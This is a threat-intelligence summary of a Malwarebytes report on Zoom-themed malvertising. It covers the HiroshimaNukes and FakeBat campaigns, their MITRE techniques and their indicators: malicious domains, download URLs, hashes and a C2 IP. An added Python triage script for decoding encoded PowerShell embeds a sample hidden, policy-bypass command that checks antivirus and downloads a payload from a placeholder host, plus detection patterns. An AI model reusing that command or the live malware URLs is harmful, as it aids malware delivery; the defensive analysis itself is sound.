Malvertisers zoom in on cryptocurrencies and initial access | Malwarebytes

Malvertising campaigns exploiting Google searches for Zoom have grown, redirecting victims to fake Zoom pages and malicious installers. The article highlights two cases—HiroshimaNukes and FakeBat with Hunting panel 1.40—showing loaders and data-stealing payloads delivered through cloaked redirects and DLL side-loading. #HiroshimaNukes #FakeBat #HuntingPanel140 #AppsFlyer #HYROS #Zoom #ZoomInstaller

Keypoints

  • The number and prominence of Zoom-related malvertising campaigns have increased, targeting both individuals and corporate users.
  • Searchers are redirected via cloaked Google ads and tracking templates: non-targets land on the legitimate Zoom site, intended victims on a fake Zoom site that serves the download.
  • Case #1 introduces HiroshimaNukes, a loader that uses DLL side-loading to drop a data-stealing payload and perform exfiltration.
  • Case #2 introduces FakeBat with a new “Hunting panel 1.40” to track malvertising campaigns and use PowerShell/MSIX-based delivery.
  • The main Zoom installer shown to victims is a legitimate signed binary, while malicious DLLs and a large padded payload enable stealthy execution.
  • Attackers rely on ad accounts (sometimes compromised) and fake identities to run large numbers of malicious Zoom ads.

MITRE Techniques

  • [T1189] Drive-by Compromise – The threat actor is targeting users via Google ads related to a search for zoom. ‘The threat actor is targeting users via Google ads related to a search for zoom’
  • [T1204] User Execution – Users are tricked into downloading a file called ZoomInstaller.zip. ‘Users are tricked into downloading a file called ZoomInstaller.zip’
  • [T1574.001] DLL Search Order Hijacking – _Zoom.exe side-loads libcrypto-3-zm.dll; DLL side-loading is used to bypass detection. ‘The _Zoom.exe side-loads libcrypto-3-zm.dll’
  • [T1036] Masquerading – Main executable is a legitimate binary signed by Zoom Video Communications, Inc. ‘The _Zoom.exe file is a legitimate binary signed by Zoom Video Communications, Inc’
  • [T1027] Obfuscated Files and Information – Payload inflated with junk code (binary padding, T1027.001) to evade detection; many scanners skip files above a size limit. ‘Dropped file over 774 MB… The file has been inflated with junk code’
  • [T1059.001] PowerShell – Base64-encoded PowerShell reveals the malware’s command and control server and telemetry commands. ‘The Base64-encoded PowerShell reveals the malware’s command and control server as well as a number of other commands such as reporting telemetry back about the machine and any security software installed’
  • [T1105] Ingress Tool Transfer – The download is initiated via a JavaScript event linking to where the MSIX file is hosted. ‘The download process is initiated via a JavaScript event linking to where the MSIX file is hosted’
  • [T1082] System Information Discovery – Telemetry on machine and installed security software. ‘reporting telemetry back about the machine and any security software installed’
  • [T1041] Exfiltration Over C2 Channel – Data theft via the stealer payload and exfiltration to the attacker’s server. ‘data exfiltration’
  • [T1071.001] Application Layer Protocol: Web Protocols – Communication with the command-and-control server. ‘a number of other commands such as reporting telemetry back about the machine and any security software installed’
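The PowerShell stage described above is typically passed on the command line as a Base64 blob, which is UTF-16LE text in the `-EncodedCommand` case. The triage helper below is an added example, not code from the Malwarebytes article; it pulls the blob out of a captured command line, decodes it, extracts the contact hosts, and flags the behaviours the article mentions (download, security-software discovery) plus the usual hidden-window and policy-bypass switches. The sample command line and the host `example-c2.invalid` are constructed placeholders, not indicators from the article.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed stand-in for the encoded stage (not the real script from the article).
SAMPLE_SCRIPT = (
    "$c2 = 'http://example-c2.invalid/ld/zm.tar.gpg';"
    "$av = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct;"
    "Invoke-WebRequest -Uri $c2 -OutFile \"$env:TEMP\\zm.tar.gpg\""
)
# PowerShell's -EncodedCommand expects Base64 of UTF-16LE text.
ENCODED_COMMAND = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode()
SAMPLE_CMDLINE = "powershell.exe -w hidden -ep bypass -enc " + ENCODED_COMMAND

ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
BEHAVIOURS = {
    "download": r"Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer|curl\.exe",
    "av-discovery": r"SecurityCenter2|AntiVirusProduct|Get-MpComputerStatus",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "policy-bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
}


def decode_powershell_b64(blob: str) -> str:
    """Decode a Base64 PowerShell payload, preferring UTF-16LE when the bytes look like it."""
    raw = base64.b64decode(blob)
    # ASCII text in UTF-16LE has a NUL in every odd position; use that as the tell.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")


def triage_commandline(cmdline: str) -> dict:
    """Extract and decode the encoded stage, then list contact hosts and flagged behaviours."""
    m = ENC_ARG.search(cmdline)
    script = decode_powershell_b64(m.group(1)) if m else ""
    combined = cmdline + "\n" + script  # switches live on the outer command line
    urls = URL_RE.findall(script)
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    flags = sorted(name for name, pat in BEHAVIOURS.items() if re.search(pat, combined, re.I))
    return {"script": script, "urls": urls, "hosts": hosts, "flags": flags}


if __name__ == "__main__":
    result = triage_commandline(SAMPLE_CMDLINE)
    print("hosts:", result["hosts"])
    print("flags:", result["flags"])
    print("script:", result["script"])
```

Feed it the `CommandLine` field from Sysmon event 1 or a 4688 event with command-line auditing enabled; the hosts list is what you pivot on against proxy and DNS logs.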

Indicators of Compromise

  • [Domain] zoom-us.tech – Fake Zoom site used in Case #1
  • [URL] zoom-us.tech/ZoomInstaller.zip – Download URL for Case #1
  • [File hash] fd524641d2be705d76feb0453374c5b2ad9582ced4f00bb3722b735401da2762 – Fake Zoom installer archive, Case #1 (SHA-256)
  • [File hash] 30fda67726f77706955f6b52b202452e91d5ff132783854eec63e809061a4b5c – Malicious DLL (libcrypto-3-zm.dll), Case #1 (SHA-256)
  • [File hash] 5b917d04d416cafaf13ed51c40b58dc8b4413483ea3f5406b8348038125cad0b – Stealer payload, Case #1 (SHA-256)
  • [IP] 94.131.110.127 – Case #1 C2
  • [Domain] z00nn.one-platform-to-connect.group – Case #2 fake Zoom site
  • [Domain] info-zoomapp.com – Case #2 fake Zoom site
  • [Domain] zoomnewsonly.site – Case #2 fake Zoom site
  • [Domain] zoonn.virtual-meetings.cn.com – Case #2 fake Zoom site
  • [Domain] promoapp-zoom.com – Case #2 fake Zoom site
  • [URL] youstorys.com/fonts/Zoom-x64.msix – Case #2 download URL
  • [URL] windows-rars.shop/bootstrap/Zoom-x64.msix – Case #2 download URL
  • [URL] scheta.site/apps.store/ZoomInstaller.msix – Case #2 download URL
  • [File hash] dcb80bd21bd6900fe87423d3fb0c49d8f140d5cf5d81b662cd74c22fca622893 – Installer (Zoom-x64.msix), Case #2 (SHA-256)
  • [File hash] 44cac5bf0bab56b0840bd1c7b95f9c7f5078ff417705eeaaf5ea5a2167a81dd5 – Installer (ZoomInstaller.msix), Case #2 (SHA-256)
  • [File hash] 462df2e4a633e57de0d5148060543576d7c1165bf90e6aec4183f430d8925a1c – Case #2 installer or related payload (SHA-256)
  • [URL] winkos.net/ld/zm.tar.gpg – Encrypted payload URL (Case #2)
  • [Domain] 2311foreign.xyz – FakeBat C2

Read more: https://www.malwarebytes.com/blog/threat-intelligence/2023/12/malvertisers-zoom-in-on-cryptocurrencies-and-initial-access